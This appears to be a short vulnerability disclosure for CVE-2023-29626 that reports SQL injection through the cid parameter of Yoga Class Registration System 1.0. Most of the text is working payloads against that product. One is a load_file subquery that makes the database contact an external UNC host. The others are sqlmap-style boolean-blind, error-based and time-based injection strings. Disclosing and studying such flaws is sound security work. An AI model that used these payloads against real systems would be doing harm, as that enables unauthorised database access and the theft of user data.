Headline
CVE-2023-29626: CVE-nu11secur1ty/vendors/oretnom23/2023/Yoga-Class-Registration -1.0-2023 - Multiple-SQLi at main · nu11secur1ty/CVE-nu11secur1ty
Yoga Class Registration System 1.0 was discovered to contain a SQL injection vulnerability via the cid parameter at /admin/login.php.
The cid parameter appears to be vulnerable to Multiple-SQL injection attacks. The payload ‘+(select load_file(‘\\aaob4nk5vd0lv9e50qp2c5c1dsjl7iv9yxpkg85.stupid.com\shs’))+’ was submitted in the cid parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The attacker easily can steal all information about this server and this could be awful for all users of this system.
— Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=yclasses/registration&cid=158158925’ or ‘6060’=’6060’ AND 7469=7469 AND 'IrlM’=’IrlM
Type: error\-based
Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: p\=yclasses/registration&cid\=158158925' or '6060'\='6060' AND (SELECT 6894 FROM(SELECT COUNT(\*),CONCAT(0x71786b7071,(SELECT (ELT(6894=6894,1))),0x716a6a7871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'CykB'\='CykB
Type: time\-based blind
Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
Payload: p\=yclasses/registration&cid\=158158925' or '6060'\='6060' AND (SELECT 9785 FROM (SELECT(SLEEP(3)))edGv) AND 'KLgd'\='KLgd
—